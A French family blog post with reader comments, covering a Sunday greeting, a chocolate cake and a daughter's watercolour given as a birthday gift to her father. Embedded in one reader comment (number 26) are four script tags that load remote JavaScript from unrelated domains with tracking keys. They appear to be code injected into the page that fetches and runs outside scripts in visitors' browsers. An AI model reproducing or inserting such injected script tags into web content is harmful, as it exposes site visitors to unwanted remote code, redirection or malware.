• Bon Dimanche ♥♥♥

     

     

    Bon Dimanche ♥♥♥

     

     

     

     

    J'espère que vous allez toutes très bien.... On se retrouve en ce Dimanche pour quelques nouvelles créas et quelques photos de l'Anniversaire de ma Moitié....

     

     

     

     

    Bon Dimanche ♥♥♥

     

     

     

     

    Je vous ai fait une créa que vous pouvez retrouver dans la Rubrique "Soirée-Nuit"-"Divers" ICI

    ça faisait longtemps que je n'en avais pas fait...

     

     

     

     

    Bon Dimanche ♥♥♥

     

     

     

     

     

    Bon Dimanche ♥♥♥

     

     

     

     

    Je termine avec les photos de mon Gâteau tout chocolat, une recette trouvée sur le Net c'est la recette du gâteau au chocolat de Cyril Lignac..... Il est léger contrairement à ce qu'on pourrait penser....

     

     

     

     

    Bon Dimanche ♥♥♥

     

     

     

     

    Notre Puce adorée a offert à son papa une aquarelle faite à partir d'une photo souvenir...

     

     

     

     

    Bon Dimanche ♥♥♥

     

     

     

     

    Bon Dimanche ♥♥♥

     

     

     

     

    Bon Dimanche ♥♥♥

     

    { Rubrique "Séparations"-"Homme,Femme,Mode" ICI }

     

     

     

     

    Bon Dimanche ♥♥♥

     

    { Rubrique "Jours"-"Dimanche"-"Hiver" ICI }

     

     


    Tags Tags : , , , , , , , , , ,
  • Commentaires

    28
    Jeudi 25 Février 2021 à 11:35
    Cc value ses un beau partage désolé si je te réponds plus a tes com mes j ai un problème je ne peut plus répondre je vais voir sa la semaine prochaine avec une amie donc pardonne moi bonne journée gros bisous
    27
    Mercredi 24 Février 2021 à 20:52
    dane

    joyeux anniv en retard, pour ton homme, ton gâteau est superbe, et l' aquarelle de ta fille est tout aussi jolie, bravo a vous bisous a très vite 

    26
    mamijojo77100
    Lundi 22 Février 2021 à 20:57

    ton gateau a l air delicieux.. beau cadeau de fifille a son papa.. et bon anniversaire a ton namoureux..bone semaine gbisous joelle.

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script>

    <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script>

    <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1614023704334" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>

    25
    Lundi 22 Février 2021 à 20:05

    Bonsoir ma douce Valie

    Avec un peu de retard je souhaite un bon anniversaire

    à ton cher mari et bravo pour ton gâteau qui semble bien bon quand à ta fille un beau cadeau pour son papa  fait maison c'est encore mieux !

    Je te souhaite une bonne soirée ainsi qu'a ta petite famille

    Gros bisous d'amitié

    Janine

    24
    Lundi 22 Février 2021 à 13:46
    Hélène

    Un anniversaire joliment marqué ! Merci pour tes belles créas !
    Gros Bisous

    23
    Lundi 22 Février 2021 à 06:12

    Ton mari a été bien gâtée, ton gâteau me fait de l'oeil lol

    Et félicitations à ta fille pour son aquarelle, c'et magnifique!

    Bisous et belle semaine

    22
    Dimanche 21 Février 2021 à 23:50

    Bon anniversaire à Monsieur qui a été bien gâté de multiples façons ;

    Bisous / Nicole

    21
    Dimanche 21 Février 2021 à 22:46
    Bon anniversaire à ton mari et bravo à ta fille pour ce cadeau qu'il gardera toujours auprès de lui ! Gros bisous
    20
    Jeannine (cristal24)
    Dimanche 21 Février 2021 à 20:52

    Il a l'air bien bon ce gâteau, même si je n'aime pas trop les gâteaux au chocolat.

    Et bravo à ta fille pour son aquarelle.

    Bonne soirée.  Bises.

    Jeannine

    19
    Dimanche 21 Février 2021 à 19:15

    Génial le cadeau de ta fille !! 
    L'anniv de mon mari est demain donc je suis pas mal occupée et en retard pour plein de choses notamment les visite sur les blogs et les anniversaires...

    Bises

    Thaly

    18
    Dimanche 21 Février 2021 à 18:49

    Hum un gâteau au chocolat !

    L'anniversaire de mon mari c'était hier.

     un beau cadeau de la part de sa ille.
    Bonne soirée.
    Bises;

     

    17
    Anges
    Dimanche 21 Février 2021 à 17:59

    Le gâteau a l'air trop, trooooop bon en plus d'être beau.

    Félicitations à ta fille pour ce magnifique cadeau qui a du pas mal émouvoir son papa, elle est douée!

    Bonne fin de week-end, bises. Laurence

    16
    Jacline-H-49
    Dimanche 21 Février 2021 à 17:15

    Gâté par vous deux, toi et Fanélie, pour son anniversaire ton Patrick, régal gustatif et régal des yeux.

    Parce que si je n'ai pas pu gouter au gâteau, je vois une aquarelle plutôt bien faite. Et un Papa tout attendri.

    Merci pour ce partage ma Valie.

    GROS BISOUS pour bien terminer la journée, de 

    Jacline

     

     

    15
    Dimanche 21 Février 2021 à 17:02

    Ton mari a dû être très ému par ce magnifique gâteau et l'aquarelle de votre Puce. Que du bonheur cette journée spéciale. Passe une bonne soirée, gros bisous !

    14
    Dimanche 21 Février 2021 à 16:51

    Vous l'avez bien gâté toutes les deux avec un délicieux gâteau et une belle aquarelle bravo à vous deux

    Gros bisous Pierrette67

    13
    Dimanche 21 Février 2021 à 16:50

    Ta fille a du talent et elle a de qui tenir.  Bravo!

    https://i.postimg.cc/PJd9GRht/bisous-valie.gif

    12
    Dimanche 21 Février 2021 à 16:35
    lamanuelle25

    Merci et bon anniversaire à ton mari et sympa l'aquarelle!! Bises Nadine

    11
    marianne
    Dimanche 21 Février 2021 à 14:20

    Un gâteau succulent et l'aquerelle est très jolie, bravo à ta fille !!

    Gros bisous

    Marianne

    10
    Dimanche 21 Février 2021 à 10:31

    Superbe aquarelle bien réalisé !!  Que des tristes dans ta famille bravo moi impossible de faire des portraits je n y arrive pas gros bisous à vous et merci pour ce partage 

    9
    Dom71
    Dimanche 21 Février 2021 à 10:14
    Bonjour et bon dimanche à vous, sous le soleil ☀
    8
    Dimanche 21 Février 2021 à 10:00

    De Merveilleux moments remplis d'Amour !! ça fait tellement plaisir à voir !! Joliment gâté ton "Namoureux" déjà par l'aquarelle de votre Puce & ce gâteau au chocolat, j'en aurai bien mangé un tit bout avec vous, Lol !!!

    Merci pour ce délicieux Billet, belle journée à vous.

    Doux Bisous affectueux.

    7
    Jour de mai
    Dimanche 21 Février 2021 à 09:27

    Coucou Valie, 

    Un billet empreint de plein d'amour. 

    Quel beau gâteau, on en mangerait.

    Et Bravo à votre puce pour l'aquarelle, très réussie, elle est très douée.

    Mr a été vraiment gâté pour son anniversaire. De très belles photos souvenirs. 

    En voyant la photo, j'ai vraiment trouvé une ressemblance avec ma créa anniversaire. 

    Excellent dimanche et de gros bisous ♥♥♥♥♥

    LN

     

    6
    Dimanche 21 Février 2021 à 09:09

    très belle créa et ton gâteau très appétissant ! j'adore le chocolat !!!

    bravo à ta fille pour cette magnifique aquarelle ! 

    un super cadeau 

    bisous

    5
    Dimanche 21 Février 2021 à 09:03

    Un bon gâteau bien appétissant et superbe l'aquarelle de ta fille!! Bravo à vous deux.......

    Bon anniversaire à ton époux.

    Bisous et doux dimanche

    4
    Dimanche 21 Février 2021 à 08:37

    Bonjour , voilà un mari et papa super gâté

    bravo à vous 2

    Bon dimanche, bises

    3
    Dimanche 21 Février 2021 à 08:29

    Il a été bien gâté ce chéri et papa ! de belles photos souvenirs ! Merci pour le partage Valie !

    Bon dimanche ! Bisous bisous !

    2
    Dimanche 21 Février 2021 à 07:32

    superbes cadeaux, bravo les filles ;) bon dimanche !

    1
    Dimanche 21 Février 2021 à 07:27

    Bonjour Valie, c'est super chouette !! le gâteau et l'aquarelle sont très réussis .... bravo 

    ton homme a du être ravi

    Bon W.E

    bisous de Pat

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :